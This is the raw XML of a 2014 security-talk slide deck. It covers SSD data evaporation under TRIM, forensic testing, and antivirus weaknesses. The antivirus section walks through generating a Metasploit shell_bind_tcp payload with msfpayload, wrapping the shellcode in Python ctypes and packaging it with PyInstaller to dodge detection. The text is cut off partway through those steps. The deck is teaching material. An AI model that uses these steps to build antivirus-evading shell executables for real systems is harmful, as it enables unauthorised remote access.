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mp4" ContentType="video/unknown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8" r:id="rId2"/>
    <p:sldId id="289" r:id="rId3"/>
    <p:sldId id="342" r:id="rId4"/>
    <p:sldId id="354" r:id="rId5"/>
    <p:sldId id="365" r:id="rId6"/>
    <p:sldId id="358" r:id="rId7"/>
    <p:sldId id="359" r:id="rId8"/>
    <p:sldId id="366" r:id="rId9"/>
    <p:sldId id="360" r:id="rId10"/>
    <p:sldId id="367" r:id="rId11"/>
    <p:sldId id="355" r:id="rId12"/>
    <p:sldId id="357" r:id="rId13"/>
    <p:sldId id="373" r:id="rId14"/>
    <p:sldId id="374" r:id="rId15"/>
    <p:sldId id="361" r:id="rId16"/>
    <p:sldId id="368" r:id="rId17"/>
    <p:sldId id="369" r:id="rId18"/>
    <p:sldId id="370" r:id="rId19"/>
    <p:sldId id="371" r:id="rId20"/>
    <p:sldId id="372" r:id="rId21"/>
    <p:sldId id="364" r:id="rId22"/>
    <p:sldId id="362" r:id="rId23"/>
    <p:sldId id="375" r:id="rId24"/>
    <p:sldId id="363" r:id="rId25"/>
    <p:sldId id="377" r:id="rId26"/>
    <p:sldId id="378" r:id="rId27"/>
    <p:sldId id="379" r:id="rId28"/>
    <p:sldId id="380" r:id="rId29"/>
    <p:sldId id="381" r:id="rId30"/>
    <p:sldId id="382" r:id="rId31"/>
    <p:sldId id="383" r:id="rId32"/>
    <p:sldId id="384" r:id="rId33"/>
    <p:sldId id="385" r:id="rId34"/>
    <p:sldId id="386" r:id="rId35"/>
    <p:sldId id="387" r:id="rId36"/>
    <p:sldId id="388" r:id="rId37"/>
    <p:sldId id="389" r:id="rId38"/>
    <p:sldId id="390" r:id="rId39"/>
    <p:sldId id="391" r:id="rId40"/>
    <p:sldId id="392" r:id="rId41"/>
    <p:sldId id="393" r:id="rId42"/>
    <p:sldId id="394" r:id="rId43"/>
    <p:sldId id="395" r:id="rId44"/>
    <p:sldId id="396" r:id="rId45"/>
    <p:sldId id="397" r:id="rId46"/>
    <p:sldId id="398" r:id="rId47"/>
    <p:sldId id="399" r:id="rId48"/>
    <p:sldId id="400" r:id="rId49"/>
    <p:sldId id="401" r:id="rId50"/>
    <p:sldId id="402" r:id="rId51"/>
    <p:sldId id="403" r:id="rId52"/>
    <p:sldId id="404" r:id="rId53"/>
    <p:sldId id="405" r:id="rId54"/>
    <p:sldId id="406" r:id="rId55"/>
    <p:sldId id="407" r:id="rId56"/>
    <p:sldId id="408" r:id="rId57"/>
    <p:sldId id="409" r:id="rId58"/>
    <p:sldId id="410" r:id="rId59"/>
    <p:sldId id="411" r:id="rId60"/>
    <p:sldId id="412" r:id="rId61"/>
    <p:sldId id="413" r:id="rId62"/>
    <p:sldId id="414" r:id="rId63"/>
    <p:sldId id="415" r:id="rId64"/>
    <p:sldId id="416" r:id="rId65"/>
    <p:sldId id="417" r:id="rId66"/>
    <p:sldId id="418" r:id="rId67"/>
    <p:sldId id="419" r:id="rId68"/>
    <p:sldId id="420" r:id="rId69"/>
    <p:sldId id="421" r:id="rId70"/>
    <p:sldId id="422" r:id="rId71"/>
    <p:sldId id="423" r:id="rId72"/>
    <p:sldId id="424" r:id="rId73"/>
    <p:sldId id="425" r:id="rId74"/>
    <p:sldId id="426" r:id="rId75"/>
    <p:sldId id="427" r:id="rId76"/>
    <p:sldId id="428" r:id="rId77"/>
    <p:sldId id="429" r:id="rId78"/>
    <p:sldId id="430" r:id="rId79"/>
    <p:sldId id="431" r:id="rId80"/>
    <p:sldId id="432" r:id="rId81"/>
    <p:sldId id="433" r:id="rId82"/>
    <p:sldId id="434" r:id="rId83"/>
    <p:sldId id="435" r:id="rId84"/>
    <p:sldId id="436" r:id="rId85"/>
    <p:sldId id="440" r:id="rId86"/>
    <p:sldId id="438" r:id="rId87"/>
    <p:sldId id="437" r:id="rId88"/>
    <p:sldId id="439" r:id="rId8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CE12"/>
    <a:srgbClr val="21E60D"/>
    <a:srgbClr val="2EFF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610" autoAdjust="0"/>
    <p:restoredTop sz="97868" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="92" d="100"/>
          <a:sy n="92" d="100"/>
        </p:scale>
        <p:origin x="-23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printerSettings" Target="printerSettings/printerSettings1.bin"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId94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3B9E1-7A87-5A43-B301-2F6A43B3B5A7}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/10/14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4F93B-0C03-2547-B914-72EBBC14D3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575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3B9E1-7A87-5A43-B301-2F6A43B3B5A7}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/10/14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4F93B-0C03-2547-B914-72EBBC14D3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9624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3B9E1-7A87-5A43-B301-2F6A43B3B5A7}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/10/14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4F93B-0C03-2547-B914-72EBBC14D3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419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3B9E1-7A87-5A43-B301-2F6A43B3B5A7}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/10/14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4F93B-0C03-2547-B914-72EBBC14D3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8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3B9E1-7A87-5A43-B301-2F6A43B3B5A7}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/10/14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4F93B-0C03-2547-B914-72EBBC14D3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04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3B9E1-7A87-5A43-B301-2F6A43B3B5A7}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/10/14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4F93B-0C03-2547-B914-72EBBC14D3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324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3B9E1-7A87-5A43-B301-2F6A43B3B5A7}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/10/14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4F93B-0C03-2547-B914-72EBBC14D3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439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3B9E1-7A87-5A43-B301-2F6A43B3B5A7}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/10/14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4F93B-0C03-2547-B914-72EBBC14D3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705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3B9E1-7A87-5A43-B301-2F6A43B3B5A7}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/10/14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4F93B-0C03-2547-B914-72EBBC14D3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269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3B9E1-7A87-5A43-B301-2F6A43B3B5A7}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/10/14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4F93B-0C03-2547-B914-72EBBC14D3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2249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3B9E1-7A87-5A43-B301-2F6A43B3B5A7}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/10/14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4F93B-0C03-2547-B914-72EBBC14D3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205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D3B9E1-7A87-5A43-B301-2F6A43B3B5A7}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/10/14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04F93B-0C03-2547-B914-72EBBC14D3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5075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7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7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5122" y="296333"/>
            <a:ext cx="8489994" cy="2471561"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SSD Data Evaporation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ALSO Plaintext Logins at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Wisc.edu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275666"/>
            <a:ext cx="3200400" cy="1363133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Lockdown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July 10, 2014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 descr="lockdown-2014-logo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35" y="2767894"/>
            <a:ext cx="25400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031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626100"/>
            <a:ext cx="8229600" cy="500063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From http://www.isuppli.com/Abstract/P28276_20130322152341.pdf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2013-05-23 at 2.45.0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2978"/>
            <a:ext cx="9144000" cy="4478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586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05-22 at 8.25.09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0" t="1917"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4660900" y="1308100"/>
            <a:ext cx="3619500" cy="45496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SSDs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0767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Data can be read and written one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> at a time, but can only be erased a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>block</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> at a time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Each erasure degrades the flash—it fails around 10,000 erasures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>From </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>http://www.anandtech.com/show/2738/5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2800286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Garbage Collection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SSD controller erases pages all by itself, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>when it knows they are empty</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>TRIM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> command is sent to the SSD when a file is deleted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But only if you use a the correct OS, Partition type, and BIOS settings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Yuri </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Gubanov calls this “Self-Corrosion” – I call it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Data Evaporation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9315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 on Mac: Disk Drill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08200"/>
            <a:ext cx="3086100" cy="4017963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Deleted files from desktop evaporate in 30-60 min</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="drill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0" y="1943100"/>
            <a:ext cx="5149452" cy="327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6408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DesktopEva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61" y="1261462"/>
            <a:ext cx="8495994" cy="455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2898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 on PC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Save data on an SSD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Watch it evaporate!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How to test TRIM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>fsutil behavior query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>DisableDeleteNotify</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Zero = TRIM enabled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6385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When Does TRIM Work?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BIOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Drive must be SATA in AHCI mode, not in IDE emulation mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>SSD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>must be new (Intel: 34 nm only)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Windows 7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>or later </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>NTFS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>volumes, not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>FAT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Mac OS X 10.6.8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>or later</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Must be Apple-branded SSD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1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7877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When Does TRIM Work?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External Drives </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>must use SATA or SCSI, not USB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>PCI-Express </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>RAID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>does not support TRIM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>From http://forensic.belkasoft.com/en/why-ssd-destroy-court-evidence</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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93617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Expert Witness Testimony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0598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court, an expert witness can state an opinion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Must be based on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>personal experience</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“I read it in a book” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“A teacher said it in a class” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“I know this because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>I tested it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1FCE12"/>
                </a:solidFill>
              </a:rPr>
              <a:t>YES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>So forensic examiners do a lot of testing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9027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1-12-10 at 4.58.5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222" y="2524478"/>
            <a:ext cx="40640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327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SSDs retain deleted data sometimes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Other times they don’t</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It depends on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Manufacturer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>BIOS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Who knows what else</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9510694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evap Tool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For Mac OS X Only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1195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30262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Intro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evap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00" y="1263046"/>
            <a:ext cx="7404100" cy="559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7294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Evaporation on JHFS+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evap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0" y="1600200"/>
            <a:ext cx="7391400" cy="520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8789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 Evaporation on HFS+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evap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00200"/>
            <a:ext cx="7404100" cy="522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5775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378857"/>
            <a:ext cx="7772400" cy="3193143"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0" smtClean="0"/>
              <a:t>Antivirus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Ungh!  Good God y'all...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6700" dirty="0" smtClean="0"/>
              <a:t>What is it GOOD For?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1582609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4-05-22 at 9.18.0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29" y="1032002"/>
            <a:ext cx="7946571" cy="2533445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5" name="Picture 4" descr="Screen Shot 2014-05-22 at 9.17.1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57" y="3970191"/>
            <a:ext cx="8146143" cy="1785147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1032921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Mikko Hypponen Video</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="F-secure's Mikko Hyppönen_ Full talk from Wired 2012_2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4825" y="1600200"/>
            <a:ext cx="8135938" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1735344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Metasploit Payloads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49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Metasploit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Hundreds of payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The simplest one: bind_tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Listens on a TCP port for commands</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Screen Shot 2014-05-22 at 11.21.32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087"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="491702" y="3733375"/>
            <a:ext cx="8195098" cy="21435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31333" y="4615555"/>
            <a:ext cx="4289778" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="508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802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Data Remanence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34727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 Reverse Shell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One command to produce very simple Windows EXE malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="p8-av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420985"/>
            <a:ext cx="8490857" cy="21457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68221" y="3405946"/>
            <a:ext cx="6290029" cy="308804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321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Antivirus Catches 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p8-av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484" y="2030583"/>
            <a:ext cx="7115904" cy="3834918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3489009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Norton v. Shell.exe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4-05-22 at 10.18.1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328" y="1600200"/>
            <a:ext cx="6679693" cy="484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55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Norton Identifies the Metasploit Packer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4-05-22 at 10.19.5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95784"/>
            <a:ext cx="8066956" cy="3675669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549437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VirusTotal: 37/49 Detections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p8-av9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3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="718085" y="1417638"/>
            <a:ext cx="7968715" cy="522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438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08000" y="1955801"/>
            <a:ext cx="2768600" cy="2457450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How to Become 007</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="rogermooreliveandletdi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000" y="369543"/>
            <a:ext cx="4950000" cy="613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418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4-05-22 at 9.27.4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554" y="402770"/>
            <a:ext cx="5050303" cy="622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308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058333"/>
            <a:ext cx="7772400" cy="3795889"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
              <a:t>Python v. AV</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Round 1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>shell_bind_tcp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1918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Export Metasploit Payloads to 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Screen Shot 2014-05-22 at 11.30.1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11153"/>
            <a:ext cx="8366796" cy="288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347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Ctypes Python Library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4-05-22 at 11.31.0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46986"/>
            <a:ext cx="8229600" cy="1599787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2014-05-22 at 11.32.0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985049"/>
            <a:ext cx="8229600" cy="112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329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Deleted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784600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>On magnetic hard disks, data remains till it is overwritten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Image from www.howstuffworks.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="adding-a-hard-disk-1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1511300"/>
            <a:ext cx="3835400" cy="382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3280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Compile it on Windows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Install these  things, in order</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Python 2.7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PyWin32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pip-Win</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PyInstaller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This creates an EXE file that listens on a TCP port</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-22 at 11.35.2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29452"/>
            <a:ext cx="9144000" cy="99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480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39800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DEMO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000" y="1193800"/>
            <a:ext cx="8890000" cy="5664200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>On Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>msfpayload windows/shell_bind_tcp C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&gt; foo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>nano foo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change top to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>from ctypes import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>shellcode = (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
